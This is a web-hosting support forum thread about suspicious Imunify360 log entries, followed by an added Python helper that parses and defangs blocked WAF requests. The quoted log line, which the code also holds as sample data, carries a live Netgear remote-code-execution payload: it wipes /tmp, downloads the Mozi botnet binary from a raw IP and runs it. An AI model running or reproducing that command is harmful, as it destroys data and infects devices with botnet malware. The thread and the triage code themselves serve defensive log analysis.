Should I be concerned about these log entries?
Glenn Taylor
Wednesday, 16 September 2020
- Anomaly detected in file '/tmp/#sql_80d_2.MAD'. Hidden from stats, but showing up on readdir. Possible kernel level rootkit.

There were a number of these log entries around the same time:

- IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||

I don’t see #sql_80d_2.MAD in /tmp

It looks kind of nasty.

Any insight would be appreciated.

Thx
G
  1. 17.09.2020 10:09:42
  2. # 1
Sergey Khristich Accepted Answer
Posts: 461
Joined: 20.05.2019
Hello Glenn,
Thank you for reaching out! These log entries mean that malware requests come to your server in a random order, and the Imunify360 firewall blocks these requests. It does not mean that your server has been compromised.
You can also create a ticket https://cloudlinux.zendesk.com/hc/en-us/requests/new to check the infection of the server, and our malware analysts will be able to check for sure.
If you have any other questions, feel free to ask here. Thank you for contacting us.
Marketing Manager
  1. 17.09.2020 22:09:53
  2. # 2
Glenn Taylor Accepted Answer
Posts: 38
Joined: 23.04.2015
Thanks Sergey for your reply. My tech confirmed as well that it's nothing to worry about.
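
Added example, not part of the original thread and not Imunify360's own tooling: a small Python triage helper for the WAF entry quoted in the first post. It assumes `||` separates fields and that `MVN`/`MV` hold the matched variable name and value (ModSecurity-style naming); it parses the entry, extracts the file the blocked command would have written, and checks whether that file exists on disk.

```python
import os
import re
import shlex

# Constructed sample: the WAF entry quoted in the original post.
SAMPLE = ("IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||"
          "MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m "
          "-O /tmp/netgear;sh netgear||")

def parse_waf_entry(line):
    """Split 'IM360 WAF: <rule>||KEY:value||...' into a dict.
    Assumption: '||' separates fields and the first ':' ends each key."""
    head, *fields = [f for f in line.strip().lstrip("- ").split("||") if f]
    if "IM360 WAF:" not in head:
        raise ValueError("not an IM360 WAF entry")
    entry = {"rule": head.split("IM360 WAF:", 1)[1].strip()}
    for field in fields:
        key, _, value = field.partition(":")
        entry[key] = value
    return entry

def download_targets(payload):
    """Return (url, output_path) for every wget command in the blocked value."""
    targets = []
    for command in payload.split(";"):
        try:
            words = shlex.split(command)
        except ValueError:          # unbalanced quotes in attacker input
            words = command.split()
        if words[:1] != ["wget"]:
            continue
        url = next((w for w in words if re.match(r"https?://", w)), None)
        out = words[words.index("-O") + 1] if "-O" in words[:-1] else None
        targets.append((url, out))
    return targets

def defang(url):
    """Make a URL non-clickable for tickets and reports."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def triage(line, exists=os.path.exists):
    """List what the blocked payload would have written and whether it is on disk."""
    entry = parse_waf_entry(line)
    return [{"rule": entry["rule"], "source": entry.get("MVN"),
             "url": defang(url) if url else None, "path": path,
             "present": bool(path) and exists(path)}
            for url, path in download_targets(entry.get("MV", ""))]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A finding with `present` set to true means a file exists at the path named in the blocked request, which is worth including in the support ticket mentioned above.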